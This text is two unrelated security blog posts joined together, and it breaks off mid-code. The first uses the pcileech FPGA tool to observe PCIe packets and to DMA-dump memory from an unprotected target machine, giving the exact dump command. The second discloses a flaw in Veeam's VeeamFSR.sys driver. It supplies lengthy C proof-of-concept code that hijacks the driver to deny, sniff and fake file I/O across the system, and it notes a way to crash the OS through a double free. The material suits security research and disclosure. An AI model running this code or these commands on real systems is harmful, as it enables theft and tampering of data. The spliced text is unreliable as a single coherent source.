For this experiment, I’m using the fantastic Pcileech project. This project uses a range of possible Xilinx FPGA boards to perform arbitrary DMA operations with a target machine through the card. The card hooks up to a sideband host machine awaiting commands and sends and receives TLPs over a connection (typically USB, sometimes UDP) to the FPGA board that eventually gets sent/received on the actual PCIe link. Basically, this project creates a “tunnel” from PCIe TLP link to the host machine to perform DMA with a target machine.

If you are not aware, FPGA stands for Field-Programmable Gate Array. It is essentially a chip that can have all of its digital logic elements reprogrammed at runtime. This allows a hardware designer to create and change high speed hardware designs on the fly without having to actually create a custom silicon chip, which can easily run in the millions of USD. The development boards for these FPGAs start at about $200 for entry level boards and typically have lots of high and low speed I/O interfaces that the chip could be programmed to communicate to. Many of these FPGA boards support PCIe, so this is a great way to work with high speed protocols that cannot be handled by your standard microcontroller.

Artix -7 FPGA

Image © Advanced Micro Devices, Inc

FPGAs are a very difficult space to break into. For a beginner book on FPGAs, I highly recommend this new book from No Starch (Russell Merrick): Getting Started with FPGAs. However, to use the Pcileech project, you can purchase one of the boards listed under the project compatibility page on GitHub and use it without any FPGA knowledge.

For my project, I am using my Alinx AX7A035 PCIe 2.0 Development Board. This is a surprisingly cheap PCIe-capable FPGA board, and Alinx has proven to me to be a fantastic company to work with as an individual. Their prices are super reasonable for their power, the company provides vast documentation of their boards and schematics, and they also provide example projects for all of the major features of the board. I highly recommend their boards to anyone interested in FPGAs.

While the pcileech project does not have any support the AX7A035 board, it does have support for the same FPGA as the one used on the AX7A035. I had to manually port the project to this Alinx board myself by porting the HDL. Hopefully this port will provide interested parties with a cheap alternative board to the ones supported by the pcileech project as is.

In the project port, the device is ported to use Gigabit Ethernet to send and receive the TLPs instead of USB3. Gigabit Ethernet operates at about 32MB/s of memory for pcileech memory dumping, which is fairly slow compared to the speeds of USB 3.0 achieved by other pcileech devices (130MB/s). However, the board does not have a FT601 USB 3.0 chip to interface with, so the next fastest thing I can easily use on this board is Ethernet.

In this DMA setup, I have the Ethernet cord attached to the system the device is attacking. This means the system can send UDP packets to perform DMA with itself.

Link will be available soon to the ported design on my GitHub.

image-20240326142707941

Shown: DMA setup. Alinx AX7A035 FPGA connected to a U4321 Slot Interposer connected to an AMD Zen 3 M-ITX Motherboard

Experiment - Viewing Configuration Space Packets

For more information about TLPs, please see Part 1 and Part 2 of my PCIe blog post series.

The first part of this experiment will be viewing what a Configuration Read Request (CfgRd) packet looks like under the analyzer. The target machine is a basic Ubuntu 22.04 Server running on a Zen 3 Ryzen 5 platform. This version of the OS does not have IOMMU support for AMD and therefore does not attempt to protect any of its memory. There is nothing special about the target machine other than the FPGA device plugged into it.

The first command we’re going to execute is the lspci command, which is a built-in Linux command used to list PCI devices connected to the system. This command provides a similar functionality to what Device Manager on Windows provides.

image-20240326145208649

Using this command, we can find that the pcileech device is located at BDF 2a:00.0. This is bus 2a, device 00, and function 0.

The next command to execute is sudo lspci -vvv -s 2a:00.0 which will dump all configuration space for the given device.

  • -vvv means maximum verbosity. We want it to dump all information it can about configuration space.
  • -s 2a:00.0 means only dump the configuration space of the device with BDF 2a:00.0, which we found above.

image-20240326145353913

Here we see a full printout of all of the details of the individual bits of each of the Capabilities in configuration space. We can also see that this pcileech device is masquerading as a Ethernet device, despite not providing any Ethernet functionality.

Now, let’s prepare the protocol analyzer to capture the CfgRd packets from the wire. This is done by triggering on TLPs sent over the link and filtering out all Data Link and Physical Layer packets that we do not care to view.

image-20240325162736643

Filter out all packets that are not TLPs since we only care about capturing TLPs in this experiment

image-20240325162741935

Now adding a trigger to automatically begin capturing packets as soon as a TLP is sent or received

With this set up, we can run the analyzer and wait for it to trigger on a TLP being sent or received. In this case, we are expecting the target machine to send CfgRd TLPs to the device to read its configuration space. The device is expected to respond with Completions with Data TLPs (CplD TLPs) containing the payload of the response to the configuration space read.

image-20240325162911910

Capture showing CfgRd and CplD packets for successful reads and completions

image-20240325162934758

In the above packet overview, we can see a few interesting properties of the packets listed by the analyzer.

  • We can see the CfgRd_0 packet is going Downstream (host -> device)
  • We can see the CplD for the packet is going Upstream (device -> host)
  • Under Register Number we see the offset of the 4-byte DWORD being read
  • Under Payload we can see the response data. For offset 0, this is the Vendor ID (2bytes) and Device ID (2bytes). 10EE is the vendor ID for Xilinx and 0666 is a the device id of the Ethernet device, as seen above in the lspci output.
  • We can see it was a Successful Completion.
  • We can see the Requester ID was 00:00.0 which is the Root Complex.
  • We can see the Completer ID was 1A:00.0 which is the Device.

Cool! Now let’s look at the individual packet structures of the TLPs themselves:

image-20240325162947215

The TLP structure for the CfgRd for a 4-byte read of offset 0x00

Here we can see the structure of a real TLP generated from the AMD Root Complex and going over the wire to the FPGA DMA device. There are a few more interesting fields now to point out:

  • Type: 0x4 is the type ID for CfgRd_0.

  • Sequence Number: The TLP sent over the link has a sequence number associated that starts at 0x00 and increments by 1. The TLP is acknowledged by the receiver after successfully being sent using an Ack Data-Link Layer packet (not shown). This ensures every packet is acknowledge as being received.
  • Length: The Length field of this packet is set to 0x01, which means it wants to read 1 DWORD of configuration space.
  • Tag: The Tag is set to 0x23. This means that the Completion containing the data being read from config space must respond with the Tag of 0x23 to match up the request and response.
  • Register Number: We are reading from offset 0x00 of config space.
  • **Requester and Completer: **Here we can see that the packet is marked with the sender and receiver BDFs. Remember that config space packets are sent to BDFs directly!

Finally, let’s look at the structure of the Completion with Data (CplD) for the CfgRd request.

image-20240325163005053

This is the response packet immediately sent back by the device responding to the request to read 4 bytes at offset 0.

Here are the interesting fields to point out again:

  • Type: 0x0A is the type for Completion

  • The TLP contains Payload Data, so the Data Attr Bit (D) is set to 1.
  • The Completer and Requester IDs remain the same. The switching hierarchy knows to return Completions back to their requester ID.
  • The Tag is 0x23, which means this is the completion responding to the above packet.
  • This packet has a Payload of 1 DWORD, which is 0xEE106606. When read as two little endian 2-byte values, this is 0x10EE and 0x0666.

We can also verify the same bytes of data were returned through a raw hex dump of config space:

image-20240325163706737

Experiment - Performing and Viewing DMA to System RAM

Setup

For the final experiment, let’s do some DMA from our FPGA device to the target system! We will do this by using pcileech to send a request to read an address and length and observing the resulting data from RAM sent from the AMD Zen 3 system back to the device.

The first step is to figure out where the device is going to DMA to. Recall in the Part 2 post that the device is informed by the device driver software where to DMA to and from. In this case, our device does not have a driver installed at all for it. In fact, it is just sitting on the PCI bus after enumeration and doing absolutely nothing until commanded by the pcileech software over the UDP connection.

To figure out where to DMA to, we can dump the full physical memory layout of the system using the following:

gbps@testbench:~/pcileech$ sudo cat /proc/iomem
00001000-0009ffff : System RAM
  00000000-00000000 : PCI Bus 0000:00
  000a0000-000dffff : PCI Bus 0000:00
    000c0000-000cd7ff : Video ROM
  000f0000-000fffff : System ROM
00100000-09afefff : System RAM
0a000000-0a1fffff : System RAM
0a200000-0a20cfff : ACPI Non-volatile Storage
0a20d000-69384fff : System RAM
  49400000-4a402581 : Kernel code
  4a600000-4b09ffff : Kernel rodata
  4b200000-4b64ac3f : Kernel data
  4b9b9000-4cbfffff : Kernel bss
69386000-6a3edfff : System RAM
6a3ef000-84ab5017 : System RAM
84ab5018-84ac2857 : System RAM
84ac2858-85081fff : System RAM
850c3000-85148fff : System RAM
8514a000-88caefff : System RAM
  8a3cf000-8a3d2fff : MSFT0101:00
    8a3cf000-8a3d2fff : MSFT0101:00
  8a3d3000-8a3d6fff : MSFT0101:00
    8a3d3000-8a3d6fff : MSFT0101:00
8a3f0000-8a426fff : ACPI Tables
8a427000-8bedbfff : ACPI Non-volatile Storage
8bedc000-8cffefff : Reserved
8cfff000-8dffffff : System RAM
8e000000-8fffffff : Reserved
90000000-efffffff : PCI Bus 0000:00
  90000000-b3ffffff : PCI Bus 0000:01
    90000000-b3ffffff : PCI Bus 0000:02
      90000000-b3ffffff : PCI Bus 0000:04
        90000000-b3ffffff : PCI Bus 0000:05
          90000000-901fffff : PCI Bus 0000:07
  c0000000-d01fffff : PCI Bus 0000:2b
    c0000000-cfffffff : 0000:2b:00.0
    d0000000-d01fffff : 0000:2b:00.0
  d8000000-ee9fffff : PCI Bus 0000:01
    d8000000-ee9fffff : PCI Bus 0000:02
      d8000000-ee1fffff : PCI Bus 0000:04
        d8000000-ee1fffff : PCI Bus 0000:05
          d8000000-d80fffff : PCI Bus 0000:08
          d8000000-d800ffff : 0000:08:00.0
          d8000000-d800ffff : xhci-hcd
          d8100000-d82fffff : PCI Bus 0000:07
          ee100000-ee1fffff : PCI Bus 0000:06
          ee100000-ee13ffff : 0000:06:00.0
          ee100000-ee13ffff : thunderbolt
          ee140000-ee140fff : 0000:06:00.0
      ee300000-ee4fffff : PCI Bus 0000:27
        ee300000-ee3fffff : 0000:27:00.3
          ee300000-ee3fffff : xhci-hcd
        ee400000-ee4fffff : 0000:27:00.1
          ee400000-ee4fffff : xhci-hcd
      ee500000-ee5fffff : PCI Bus 0000:29
        ee500000-ee5007ff : 0000:29:00.0
          ee500000-ee5007ff : ahci
      ee600000-ee6fffff : PCI Bus 0000:28
        ee600000-ee6007ff : 0000:28:00.0
          ee600000-ee6007ff : ahci
      ee700000-ee7fffff : PCI Bus 0000:26
        ee700000-ee71ffff : 0000:26:00.0
          ee700000-ee71ffff : igb
        ee720000-ee723fff : 0000:26:00.0
          ee720000-ee723fff : igb
      ee800000-ee8fffff : PCI Bus 0000:25
        ee800000-ee803fff : 0000:25:00.0
          ee800000-ee803fff : iwlwifi
      ee900000-ee9fffff : PCI Bus 0000:03
        ee900000-ee903fff : 0000:03:00.0
          ee900000-ee903fff : nvme
  eeb00000-eeefffff : PCI Bus 0000:2b
    eeb00000-eebfffff : 0000:2b:00.4
      eeb00000-eebfffff : xhci-hcd
    eec00000-eecfffff : 0000:2b:00.3
      eec00000-eecfffff : xhci-hcd
    eed00000-eedfffff : 0000:2b:00.2
      eed00000-eedfffff : ccp
    eee00000-eee7ffff : 0000:2b:00.0
    eee80000-eee87fff : 0000:2b:00.6
      eee80000-eee87fff : ICH HD audio
    eee88000-eee8bfff : 0000:2b:00.1
      eee88000-eee8bfff : ICH HD audio
    eee8c000-eee8dfff : 0000:2b:00.2
      eee8c000-eee8dfff : ccp
  eef00000-eeffffff : PCI Bus 0000:2c
    eef00000-eef007ff : 0000:2c:00.1
      eef00000-eef007ff : ahci
    eef01000-eef017ff : 0000:2c:00.0
      eef01000-eef017ff : ahci
  ef000000-ef0fffff : PCI Bus 0000:2a
    ef000000-ef000fff : 0000:2a:00.0
f0000000-f7ffffff : PCI MMCONFIG 0000 [bus 00-7f]
    f0000000-f7ffffff : pnp 00:00
  fd210510-fd21053f : MSFT0101:00
  feb80000-febfffff : pnp 00:01
  fec00000-fec003ff : IOAPIC 0
  fec01000-fec013ff : IOAPIC 1
  fec10000-fec10fff : pnp 00:05
  fed00000-fed003ff : HPET 0
    fed00000-fed003ff : PNP0103:00
  fed81200-fed812ff : AMDI0030:00
  fed81500-fed818ff : AMDI0030:00
fedc0000-fedc0fff : pnp 00:05
fee00000-fee00fff : Local APIC
  fee00000-fee00fff : pnp 00:05
  ff000000-ffffffff : pnp 00:05
100000000-24e2fffff : System RAM
  250000000-26fffffff : pnp 00:02
3fffe0000000-3fffffffffff : 0000:2b:00.0

Reserved regions removed for brevity.

In this case, for this experiment, I am going to read 0x1000 bytes (one 4096 byte page) of memory from the 32-bit address 0x10000 which begins the first range of System RAM assigned to the physical address layout:

00001000-0009ffff : System RAM

Since this is actual RAM, our DMA will be successful. If this was not memory, our request would likely receive a Completion Error with Unsupported Request.

The pcileech command to execute will be:

sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

Where:

  • The FPGA device is assigned the IP address 10.0.0.64 by my LAN
  • dump is the command to execute
  • -min 0x1000 specifies to start dumping memory from this address
  • -max 0x2000 specifies to stop dumping memory at this address. This results in 0x1000 bytes being read from the device.

Analyzer Output

image-20240325175450050

From this output, you can see an interesting property of DMA: the sheer number of packets involved. The first packet here is a MemRd_32 packet headed upstream. If the address being targeted was a 64-bit address, it would use the MemRd_64 TLP. Let’s take a look at that first:

image-20240325175506903

Here we can see a few interesting things:

  • The Requester field contains the device’s BDF. This is because the device initiated the request, not the Root Complex.
  • The Address is 0x1000. This means we are requesting to read from address 0x1000 as expected.
  • The Length is 0x000, which is the number of 4-byte DWORDs to transfer. This seems a bit weird, because we are reading 4096 bytes of data. This is actually because 0x000 is a special number that means Maximum Length. In the above bit layout, we see the Length field in the packet is 9 bits. The maximum 9 bit value that can be expressed in binary is 0x3FF. 0x3FF * 4 = 0xFFC which is 4 bytes too small to express the number 4096. Since transferring 0 bytes of data doesn’t make sense, the number is used to indicate the maximum value, or 4096 in this case!
  • The Tag is 0x80. We will expect all Completions to also have the same Tag to match the response to the request.

And finally, let’s look at the first Completion with Data (CplD) returned by the host:

image-20240325175529049

We can see right off the bat that this looks a whole lot like a Completion with Data for the config space read in the previous section. But in this case, it’s much larger in size, containing a total of 128 bytes of payload returned from System RAM to our device.

Some more interesting things to point out here:

  • Length: Length is 0x20 DWORDs, or 0x20*4=128 bytes of payload. This means that the resulting 4096 byte transfer has been split up into many CplD TLPs each containing 128 bytes of the total payload.
  • Byte Count: This value shows the remaining number of DWORDs left to be sent back for the request. In this case, it is 0x000 again, which means that this is the first of 4096 bytes pending.
  • Tag: The Tag of 0x80 matches the value of our request.
  • Requester ID: This Completion found its way back to our device due to the 2A:00.0 address being marked in the requester.
  • Completer ID: An interesting change here compared to config space, but the Completer here is not the 00:00.0 Root Complex device. Instead, it is a device 00:01.3. What device is that? If we look back up at the lspci output, this is a Root Port bridge device. It appears that this platform marks the Completer of the request as the Root Port the device is connected to, not the Root Complex itself.

And just for consistency, here is the second Completion with Data (CplD) returned by the host:

image-20240325175555617

The major change here for the second chunk of 128 bytes of payload is that the Byte Count field has decremented by 0x20, which was the size of the previous completion. This means that this chunk of data will be read into the device at offset 0x20*4 = 0x80. This shouldn’t be too surprising, we will continue to decrement this Byte Count field until it eventually reaches 0x020, which will mark the final completion of the transfer. The DMA Engine on the device will recognize that the transfer is complete and mark the original 4096 byte request as complete internally.

gbps@testbench:~/pcileech$ sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

 Current Action: Dumping Memory
 Access Mode:    Normal
 Progress:       0 / 0 (100%)
 Speed:          4 kB/s
 Address:        0x0000000000001000
 Pages read:     1 / 1 (100%)
 Pages failed:   0 (0%)
Memory Dump: Successful.

Maximum Payload Size Configuration

Now only one question remains, why are there so many Completion TLPs for a single page read?

The answer lies in a specific configuration property of the device and the platform: the Maximum Payload Size.

If we look back at the configuration space of the device:

image-20240326165151290

The Device Control register has been programmed with a MaxPayload of 128 bytes. This means that the device is not allowed to send or receive any TLP with a payload larger than 128 bytes. This means that our 4096 byte request will always be fragmented into 4096/128 = 32 completions per page.

If you notice above, there is a field DevCap: MaxPayload 256 bytes that dictates that the Device Capabilities register is advertising this device’s hardware is able to handle up to 256 bytes. So if this device supports up to 256 byte payloads, that means the device could potentially cut the TLP header overhead in half to only 16 completions per page.

It is not clear what from the platform or OS level at this exact moment has reduced the MaxPayload to 128 bytes. Typically it is the bridge device above the device in question that limits the MaxPayload size, however in this case the max size supported by the Root Port this device is connected to is 512 bytes. With some further investigation, maybe I’ll be able to discover that answer.

And there you have it, a more in-depth look into how a device performs DMA!

Conclusion

This simple experiment hopefully gives you a nicer look into the “black box” of the PCIe link. While it’s nice to see diagrams, I think it’s much sweeter to look into actual packets on the wire to confirm that your understanding is what actually happens in practice.

We saw that config space requests are simple 4-byte data accesses that utilize the CfgRd and CfgWr TLP types. This is separate from DMA or MMIO, which uses the MemRd/MemWr that are used in DMA and MMIO. We also saw how the Completions can be fragmented in order to return parts of the overall transfer for larger DMA transfers such as the 4096 page size.

I hope to provide more complex or potentially more “interactive” experiments later. For now, I leave you with this as a more simplistic companion to the Part 2 of my series.

Hope you enjoyed!

- Gbps

Veeamon

Veeam ships a signed file system filter with no ACL on its control device object. The driver allows to control all IO operations on any file in the specified folder. By abusing the driver, an attacker can sniff and fake reads, writes, and other IO operations on any file in the file system regardless of its permissions.

Some time ago, I stumbled upon the Veeam backup solution. Among other files, the installer drops VeeamFSR.sys: a file system filter driver signed by Veeam. A quick overview in IDA showed no DACL on the device object, hence full access to Everyone. So, I decided to take a deeper look. VeeamFSR exposes a set of IoCtls that allow any user-mode application to control all IO operations on the specified folder and its child objects. Once the app specifies the folder to monitor, the driver will pend all IO related to the folder and its children and notify the app about the IO. The app, in turn, can pass the IO, fail it, get the data of the IO, or even fake it. I wrote a small PoC that shows how to manipulate VeeamFSR for fun and profit.

[Setting things up]

First of all, we have to open the control device and tell the driver which folder we want to monitor. CtlCreateMonitoredFolder is a wrapper over the IOCTL_START_FOLDER_MONITORING IoCtl. This IoCtl receives the following struct as an input parameter:

struct MonitoredFolder
{
    HANDLE SharedBufSemaphore;
    DWORD d1;
    HANDLE NewEntrySemaphore;
    DWORD d2;
    DWORD f1;  //+0x10
    DWORD SharedBufferEntriesCount; //+0x14
    DWORD PathLength; //+0x18
    WCHAR PathName[0x80]; //+0x1C
};

and outputs:

struct SharedBufferDescriptor
{
    DWORD FolderIndex;
    DWORD SharedBufferLength;
    DWORD SharedBufferPtr;
    DWORD Unk;
};

Once the call to DeviceControl succeeds, VeeamFSR will wait for all calls to (Nt)CreateFile that contain the monitored folder in the pathname. All such calls will end up in a non-alertable kernel mode sleep in KeWaitForSingleObject. ExplorerWait.png The second important thing is to unwait these calls with the IOCTL_UNWAIT_REQUEST IoCtl. Failing to do so leads to application hangs. By the way, passing UnwaitDescriptor::UserBuffer to the IoCtl causes a double free in the driver, so if you want to kaboom the OS, this is the way to do it. (See CtlUnwaitRequest for details)

Internally, VeeamFSR creates and maintains lists of objects that represent monitored folders, opened streams, and a few other object types, quite similar to what the Windows object manager subsystem does. Every object has a header that contains a reference counter, a pointer to the object methods, etc. The constructor of the MonitoredFolder object, among other things, creates a shared kernel-user buffer in the context of the controller app. Contiguous.png Funny, for some reason Veeam developers think that only a contiguous buffer can be mapped to user-mode memory.

The app receives the pointer to the buffer in the SharedBufferDescriptor::SharedBufferPtr field, which is an output parameter of the IOCTL_START_FOLDER_MONITORING IoCtl. VeeamFSR writes the parameters of IO to the buffer and notifies the app about the new entry by releasing the MonitoredFolder::NewEntrySemaphore semaphore. The controller app might manipulate the IO data in the shared buffer before unwaiting the IO request. Every entry in the buffer consists of a predefined header that identifies the IO and a body which is operation dependent:

struct CtrlBlock
{
    BYTE ProcessIndex;
    BYTE FolderIndex;
    WORD FileIndex : 10;
    WORD MajorFunction : 6;
};

struct SharedBufferEntry
{
    //header
    DWORD Flags;
    union
    {
        CtrlBlock Ctrl;
        DWORD d1;
    };

    //body
    DWORD d2;
    DWORD d3;

    DWORD d4;
    DWORD d5;
    DWORD d6;
    DWORD d7;
};

Now we have everything we need to build a basic IO pump that enables monitoring for the ‘c:\tmp’ folder, logs open calls to the console, and unwaits them. Throughout the post, I will extend the snippet by adding features such as IO monitoring, failing, and faking. See the full code on GitHub.

int wmain(int arc, wchar_t** argv)
{
    if (arc != 2)
    {
        printf("Usage: veeamon NativePathToFolder\n");
        return -1;
    }

    HANDLE hDevice = CreateFileW(L"\\\\.\\VeeamFSR", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, 0, OPEN_EXISTING, 0, 0);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("CreateFileW: %d\n", GetLastError());
        return -1;
    }

    HANDLE SharedBufSemaphore;
    HANDLE NewEntrySemaphore;
    WORD CurrEntry = 0;

    PCWCHAR Folder = argv[1];
    if (CtlCreateMonitoredFolder(
        hDevice,
        Folder,
        &SharedBufSemaphore,
        &NewEntrySemaphore) == FALSE)
    {
        printf("Failed setting up monitored folder\n");
        return -1;
    }

    printf("Set up monitor on %ls\n", Folder);
    printf("FolderIndex: 0x%x\n", SharedBufDesc.FolderIndex);
    printf("Shared buffer: %p\n", (PVOID)SharedBufDesc.SharedBufferPtr);
    printf("Shared buffer length: 0x%x\n", SharedBufDesc.SharedBufferLength);
    printf("Uknown: 0x%x\n", SharedBufDesc.Unk);
    printf("\nStarting IO loop\n");

    SharedBufferEntry* IOEntryBuffer = (SharedBufferEntry*)SharedBufDesc.SharedBufferPtr;
    SharedBufferEntry* IOEntry;

    for (;;)
    {
        LONG l;

        ReleaseSemaphore(NewEntrySemaphore, 1, &l);
        WaitForSingleObject(SharedBufSemaphore, INFINITE);

        printf("Entry #%d\n", CurrEntry);

        IOEntry = &IOEntryBuffer[CurrEntry];
        switch (IOEntry->Ctrl.MajorFunction)
        {
        //
        // IRP_MJ_XXX and FastIo handlers
        //
        case 0x0: //IRP_MJ_CREATE
        case 0x33: //Fast _IRP_MJ_CREATE
        {
            PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);
            CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

            break;
        }
        default:
        {
            CHAR OpName[40]{};
            sprintf_s(OpName, 40, "IRP_MJ_%d", IOEntry->Ctrl.MajorFunction);
            PrintEntryInfo(OpName, IOEntryBuffer, &IOEntryBuffer[CurrEntry]);

            break;
        }


        //
        // Special entry handlers
        //
        case 0x37: //Name entry
        {
            printf("\tADD\n");

            switch (IOEntry->d2)
            {
            case ProcessEntry:
                printf("\tprocess: %d\n", IOEntry->d6);
                ProcessMapping[IOEntry->d3] = CurrEntry;
                break;
            case FileEntry:
                //.d4 == length
                printf("\tfile: %ls\n", (PWSTR)IOEntry->d6);
                FileMapping[IOEntry->d3] = CurrEntry;
                break;
            case MonitoredEntry:
                //.d4 == length
                printf("\tmonitored dir: %ls\n", (PWSTR)IOEntry->d6);
                break;
            }

            break;
        }
        case 0x38:
        {
            printf("\tDELETION\n");
            switch (IOEntry->d2)
            {
            case ProcessEntry:
                printf("\tprocess\n");
                break;
            case FileEntry:
                printf("\tfile\n");
                break;
            case MonitoredEntry:
                printf("\tmonitored dir\n");
                break;
            }
            printf("\tindex: %d\n", IOEntry->d2);

            break;
        }
        case 0x39:
        {
            printf("\tCOMPLETION of IRP_MJ_%d, index = %d, status = 0x%x, information: 0x%x\n",
                IOEntry->d2,
                IOEntry->d3,
                IOEntry->d4,
                IOEntry->d5);

            break;
        }
        case 0x3A:
        {
            printf("\tWRITE-related entry\n");
            break;
        }
        }

        printf("\t0x%.8x 0x%.8x  0x%.8x 0x%.8x\n", IOEntry->Flags, IOEntry->d1, IOEntry->d2, IOEntry->d3);
        printf("\t0x%.8x 0x%.8x  0x%.8x 0x%.8x\n", IOEntry->d4, IOEntry->d5, IOEntry->d6, IOEntry->d7);

        CurrEntry++;
        if (CurrEntry >= 0x200)
        {
            break;
        }
    }

    CtlDestroyFolder(hDevice, 0);
    CloseHandle(hDevice);

    printf("Press any key...\n");
    getchar();

    return 0;
}

With the snippet running on \Device\HarddiskVolume1\tmp, navigating to the ‘tmp’ folder triggers a bunch of open calls in Explorer.exe: Basic.png

[Deny everything]

VeeamFSR provides several options for handling waited IO requests:

  1. Pass through the request (boring).
  2. Deny access (better).
  3. Sniff request data (toasty).
  4. Fake request data (outstanding!).

The controller app communicates its decision to the driver by passing one or more flags from the RequestFlags enum to the CtlUnwaitRequest function, which serves as a wrapper for the IOCTL_UNWAIT_REQUEST IoCtl.

enum RequestFlags : BYTE
{
    RF_CallPreHandler = 0x1,
    RF_CallPostHandler = 0x2,
    RF_PassDown = 0x10,
    RF_Wait = 0x20,
    RF_DenyAccess = 0x40,
    RF_CompleteRequest = 0x80,
};

BOOL CtlUnwaitRequest(
    HANDLE hDevice,
    CtrlBlock* Ctrl,
    WORD SharedBufferEntryIndex,
    RequestFlags RFlags
)
{
    struct UnwaitDescriptor
    {
        CtrlBlock Ctrl;

        DWORD SharedBufferEntryIndex;
        RequestFlags RFlags;
        BYTE  IsStatusPresent;
        BYTE  IsUserBufferPresent;
        BYTE  SetSomeFlag;
        DWORD Status;
        DWORD Information;
        PVOID UserBuffer;
        DWORD d6;
        DWORD UserBufferLength;
    };

    DWORD BytesReturned;
    UnwaitDescriptor Unwait = { 0, };

    Unwait.Ctrl.FolderIndex = Ctrl->FolderIndex;
    Unwait.Ctrl.MajorFunction = Ctrl->MajorFunction;
    Unwait.Ctrl.FileIndex = Ctrl->FileIndex;
    Unwait.SharedBufferEntryIndex = SharedBufferEntryIndex;
    Unwait.RFlags = RFlags;

    Unwait.IsUserBufferPresent = 0;

    // Uncomment the code below to crash the OS.
    // VeeamFSR doesn't handle this parameter correctly. Setting IsUserBuffPresent to true 
    // leads to double free in the completion rountine.
    //Unwait.UserBuffer = (PVOID)"aaaabbbb";
    //Unwait.UserBufferLength = 8;
    //Unwait.IsUserBufferPresent = 1;


    BOOL r = DeviceIoControl(hDevice, IOCTL_UNWAIT_REQUEST, &Unwait, sizeof(Unwait), 0, 0, &BytesReturned, 0);
    if (r == FALSE)
    {
        printf("UnwaitRequest failed\n");
    }
    return r;
}

Passing the RFlags_PassDown flags tells the driver to pass through the request. This is what we did in the previous sample. On the other hand, passing the RFlags_DenyAccess flags instructs VeeamFSR to fail the IRP with the status STATUS_ACCESS_DENIED. The snippet below checks the filename of the open operation and fails it if the name contains ‘Cthon98.txt’

case 0x0: //IRP_MJ_CREATE
case 0x33: //Fast _IRP_MJ_CREATE
{
    PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);

    PCWCHAR ProtectedName = L"\\Device\\HarddiskVolume1\\tmp\\Cthon98.txt";
    DWORD EntryNameIndex = FileMapping[IOEntry->Ctrl.FileIndex];
    if (IsEqualPathName(&IOEntryBuffer[EntryNameIndex], ProtectedName))
    {
        printf("Denying access to %ls\n", ProtectedName);
        CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_DenyAccess);
        break;
    }

    CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

    break;
}

DenyAccess.png

[Sniffing writes, sniffiing reads]

Accessing request data is a bit trickier. Depending on the operation, the data might be available before or after the IRP is completed. This is where the RF_CallPreHandler and RF_CallPostHandler flags come into play. VeeamFSR provides pre and post handlers for all IRP_MJ_XXX functions and maintains an array of RequestFlags enumerations for every opened file. Each entry in the array defines how VeeamFSR should handle the call to the corresponding IRP_MJ_XXX function, regardless of whether it was waited on or not. Setting the RF_CallPre/PostHandler flag for an entry instructs the driver to execute pre/post handlers for all calls to the function, while setting the RFlags_DenyAccess flag fails all requests. The default value for all functions (except for IRP_MJ_CREATE) is RFlags_PassDown. The default for IRP_MJ_CREATE is RF_Wait.

To sniff writes, we have to enable the pre-operation handler for the IRP_MJ_WRITE function. The handler allocates memory in the controller app process, copies the write data to the allocated memory, and notifies the app by creating an IRP_MJ_WRITE entry in the shared buffer. Similarly, read sniffing works; however, it requires a post-operation handler instead of a pre-operation handler. Note that in both cases, RFlags_PassDown should be ORed with the flags since we want to pass the request down the stack. The following snippet enables read and write sniffing:

case 0x0: //IRP_MJ_CREATE
case 0x33: //Fast _IRP_MJ_CREATE
{
    PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);

    FlagsDescritptor FlagsDescs[2];
    FlagsDescs[0].Function = 3; //IRP_MJ_READ
    FlagsDescs[0].RFlags = (RequestFlags)(RF_PassDown | RF_CallPostHandler);
    FlagsDescs[1].Function = 4; //IRP_MJ_WRITE
    FlagsDescs[1].RFlags = (RequestFlags)(RF_PassDown | RF_CallPreHandler);
    CtlSetStreamFlags(hDevice, &IOEntry->Ctrl, FlagsDescs, 2);

    CtlUnwaitRequest(hDevice, &IOEntry->Ctrl, CurrEntry, RF_PassDown);

    break;
}
case 0x3: //IRP_MJ_READ
case 0x1D: //Fast IRP_MJ_READ
{
    PrintEntryInfo("IRP_MJ_READ", IOEntryBuffer, IOEntry);

    DWORD Length = IOEntry->d5;
    PBYTE Buffer = (PBYTE)IOEntry->d6;
    PrintBuffer(Buffer, Length);

    break;
}
case 0x4: //IRP_MJ_WRITE
case 0x1E: //Fast IRP_MJ_WRITE
{
    PrintEntryInfo("IRP_MJ_WRITE", IOEntryBuffer, &IOEntryBuffer[CurrEntry]);

    DWORD Length = IOEntry->d5;
    PBYTE Buffer = (PBYTE)IOEntry->d6;
    PrintBuffer(Buffer, Length);

    break;
}

Note that sometimes applications map files to memory instead of reading or writing them, so opening a file in Notepad does not always trigger IRP_MJ_READ/WRITE operations Sniff.png

[Faking reads]

Yet another delicious feature that VeeamFSR provides, namely to Everyone, is faking read data. This is what the RFlags_CompleteRequest flag is intended for. Setting this flag for the 3rd (IRP_MJ_READ) entry of the file’s array of flags tells the driver to pend read requests and to map read buffers to the controller app’s address space. The controller app might fill the buffer with fake or modified data and complete the request, passing the RFlags_CompleteRequest flag to apply changes. Unwaiting requests with this flag instructs the driver to complete the request using the IoCompleteRequest function instead of sending it to the actual file system driver. Thus, the controller app can actually fake data of any read operation in the OS. Pure evil, eh? The following snippet fakes the content of AzureDiamond.txt with ‘*’ symbols, while the real content of the file is the ‘hunter2’ string:

case 0x0: //IRP_MJ_CREATE
case 0x33: //Fast _IRP_MJ_CREATE
{
    PrintEntryInfo("IRP_MJ_CREATE", IOEntryBuffer, IOEntry);

    FlagsDescritptor FlagsDescs[2];
    if (IsEqualPathName(&IOEntryBuffer[EntryNameIndex], FakeReadName))
    {
        FlagsDescs[0].Function = 3; //IRP_MJ_READ
        FlagsDescs[0].RFlags = RF_CompleteRequest;
        FlagsDescs[1].Function = 4; //IRP_MJ_WRITE
        FlagsDescs[1].RFlags = (RequestFlags)(RF_PassDown | RF_CallPreHandler);
    }
    else
    {
        FlagsDescs[0].Function = 3; //IRP_MJ_READ
        FlagsDescs[0].RFlags = (RequestFlags)(RF_PassDown | RF_CallPostHandler);
